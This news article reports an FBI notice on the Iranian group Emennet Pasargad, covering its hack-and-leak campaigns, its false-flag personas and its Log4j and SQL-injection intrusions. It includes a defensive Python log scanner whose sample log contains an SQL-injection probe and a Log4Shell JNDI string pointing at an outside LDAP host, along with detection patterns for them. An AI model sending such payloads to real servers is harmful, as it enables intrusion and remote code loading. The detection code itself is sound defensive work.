FBI reveals Iranian cyber group Emennet Pasargad executing hack-and-leak operations using false-flag personas

The Federal Bureau of Investigation (FBI) warned of ongoing hack-and-leak cyber operations conducted by the Iranian cyber group Emennet Pasargad. The operations intend to undermine public confidence in the security of the victim’s network and data and embarrass victim companies and targeted countries. These hack-and-leak campaigns involve a combination of hacking/theft of data and information operations that impact victims through financial losses and reputational damage. 

Early this year, the Emennet Pasargad group conducted a cyber attack against a US-based organization as a means to target the Iranian opposition group The People’s Mujahedin (aka MEK), the FBI’s cyber division identified in a Private Industry Notification, released Thursday. “As a part of this operation, Emennet leaked information concerning personally identifiable information (PII) they presumably obtained via their compromise of the organization’s network. Emennet’s activity resulted in destructive effects on victim infrastructure,” it adds. 

The FBI warns that organizations Iran perceives as affiliated with the MEK are at an elevated risk of cyber exploitation or attack activities. “Although Emennet personas may exaggerate their level of access to a victim network or the volume of victim data stolen, the FBI judges that each of these campaigns likely start with some level of cyber intrusion. Historically, the actors choose victims by conducting online research into leading businesses across several sectors,” the FBI adds. 

Emennet cyber actors typically demonstrate a preference for websites running PHP code or those with externally accessible MySQL databases, the FBI said. “In most cases, these actors then use open-source penetration testing tools such as SQLmap and Acunetix. In addition to Emennet’s hack-and-leak operations, these actors have used website defacements and destructive encryption malware to cause further harm to victims’ networks.” 

Based on an analysis of FBI-acquired information, the agency attributes two false-flag personas to the Emennet Pasargad group: Savior Pro, a Palestinian hacktivist persona active between 2020 and 2022, and Deus, a cyber-criminal persona active in 2021.

In the case of Savior Pro, the FBI said that Emennet conducted four cyber campaigns that targeted entities across multiple sectors in Israel. The campaigns, most of which occurred around Qods Day, involved hack-and-leak activity and website defacements. Their latest actions, which occurred in April this year, involved a blended campaign of hacking and psychological operations to promote a political narrative.

The Emennet Pasargad group also operated under the cyber-criminal persona of Deus while conducting a lock-and-leak operation targeting an Israeli call service center. According to reports, Emennet cyber actors encrypted victim computers and leaked company data. Emennet then offered to sell the data on public forums and used a Deus Telegram channel to amplify their messaging regarding the intrusion and leaked documents.

The FBI said that the Emennet Pasargad group is likely more opportunistic in choosing victims rather than targeting specific entities. However, victim trends appear to show their preference for companies with significant traffic and a large customer base. In furtherance of Emennet’s information operations, the group often amplifies and promotes the theft and leaking of victim data on their dedicated leak websites, Telegram, and online hacking and illicit access trading forums. In addition, the hackers typically create social media accounts for each false-flag persona to generate additional attention to their activity. 

The FBI has also observed Emennet amplifying information operations by contacting news media organizations and using email marketing services. This tactic was previously observed during their campaign against the 2020 U.S. Presidential election. 

The Emennet Pasargad hackers avoid attribution by executing false-flag campaigns under multiple personas, such as hacktivists or cybercriminal groups, the FBI said. “Since at least 2020, Emennet targeted entities primarily in Israel with cyber-enabled information operations that included an initial intrusion, theft, and subsequent leak of data, followed by amplification through social media and online forums, and in some cases the deployment of destructive encryption malware,” it adds.

“Although Emennet’s latest attacks have primarily targeted Israel, the FBI judges these techniques may be used to target US entities as seen during Emennet’s cyber-enabled information operation that targeted the 2020 US Presidential election,” it adds.

Within the past year, the FBI has identified a destructive cyber attack against a U.S. organization – indicating the group remains a cyber threat to America. 

The FBI previously disseminated a Private Industry Notification on the Emennet Pasargad on January 26 this year. “In this product, the FBI identified numerous Tactics, Techniques, and Procedures used by this cyber threat actor. The FBI is re-emphasizing Emennet’s focus on the techniques to highlight how the group enables access to target websites. Emennet will leverage their access to edit content on victim websites in an effort to further their information operations,” it adds.

The FBI further assesses that the Emennet Pasargad group will likely conduct research for newly identified vulnerabilities in CKEditor and commonly used content management systems, specifically Drupal and WordPress.

The FBI and multiple U.S. and foreign partners disseminated a joint cybersecurity advisory last December, providing mitigation guidance related to vulnerabilities in Apache’s Log4j software library. Emennet exploited the Log4j vulnerability CVE-2021-44228 against at least one U.S.-based organization, which allowed the actors to access the organization’s web server. Emennet cyber actors then used destructive capabilities to take down the organization’s web server and associated websites. 
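The tooling preferences described above (SQLmap and Acunetix against PHP sites with exposed MySQL) and the Log4j exploitation both leave traces in ordinary web server access logs. The following is an added detection example written for this article, not code from the FBI notice: it parses Apache combined-format lines and flags the scanner user agents, SQL-injection probes and `${jndi:` lookup strings a defender would triage. The log lines, addresses and paths are constructed test data, not indicators from the notice.

```python
import re
from dataclasses import dataclass
from urllib.parse import unquote

# Constructed Apache combined-format access log lines: addresses, paths and
# user agents are made-up test data, not indicators from the FBI notice.
SAMPLE_LOG = """\
203.0.113.10 - - [10/Oct/2022:13:55:36 +0000] "GET /index.php?id=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.10 - - [10/Oct/2022:13:55:37 +0000] "GET /index.php?id=1%27%20AND%201=1-- HTTP/1.1" 200 5120 "-" "sqlmap/1.6.9#stable (https://sqlmap.org)"
198.51.100.7 - - [10/Oct/2022:13:56:01 +0000] "GET /login.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (compatible; Acunetix)"
192.0.2.44 - - [10/Oct/2022:13:57:12 +0000] "GET /api/search?q=%24%7Bjndi%3Aldap%3A//203.0.113.99/x%7D HTTP/1.1" 500 0 "-" "curl/7.85.0"
192.0.2.45 - - [10/Oct/2022:13:58:00 +0000] "GET /about.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"$')
# Indicator name -> (decoded field to inspect, pattern).
RULES = {
    "scanner-user-agent": ("ua", re.compile(r"sqlmap|acunetix", re.I)),
    # Tautology, UNION and comment-terminator probes typical of automated SQLi tooling.
    "sql-injection-probe": ("path", re.compile(
        r"'\s*(?:or|and)\s+\S+\s*=|\bunion\b[\s\S]{0,40}\bselect\b|--\s*$|\bsleep\(", re.I)),
    # Log4Shell (CVE-2021-44228) lookup string. Only the plain form is matched;
    # nested-lookup obfuscations such as ${${lower:j}ndi:...} need a resolver first.
    "log4shell-jndi-probe": ("path", re.compile(r"\$\{jndi:", re.I)),
}
@dataclass(frozen=True)
class Finding:
    ip: str
    indicator: str
    evidence: str  # decoded field that triggered the rule

def scan_log(text: str) -> list[Finding]:
    """One Finding per (line, rule) hit; lines that do not parse are skipped."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        fields = {"path": unquote(m["path"]), "ua": m["ua"]}
        for name, (field, rx) in RULES.items():
            if rx.search(fields[field]):
                findings.append(Finding(m["ip"], name, fields[field]))
    return findings

def summarize(findings: list[Finding]) -> dict[str, set[str]]:
    """Collapse to source IP -> indicator names, the unit an analyst triages."""
    out: dict[str, set[str]] = {}
    for f in findings:
        out.setdefault(f.ip, set()).add(f.indicator)
    return out
```

On the sample data the summary groups two indicators under the first address, one scanner hit under the second and one Log4Shell probe under the third; a blocked or 500-status probe is still worth a ticket because it shows the host is being enumerated.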

The FBI recommends that its partners remain vigilant, and if the behaviors outlined in this notification are observed, they should contact their local FBI office.

Last month, U.S. cybersecurity agencies detailed in a cybersecurity advisory that Iranian state hackers executed malicious cyber operations against the Government of Albania in July and September. The notice provided information on the recent cyber operations, including ransomware and disk-wiper attacks that rendered websites and services unavailable.
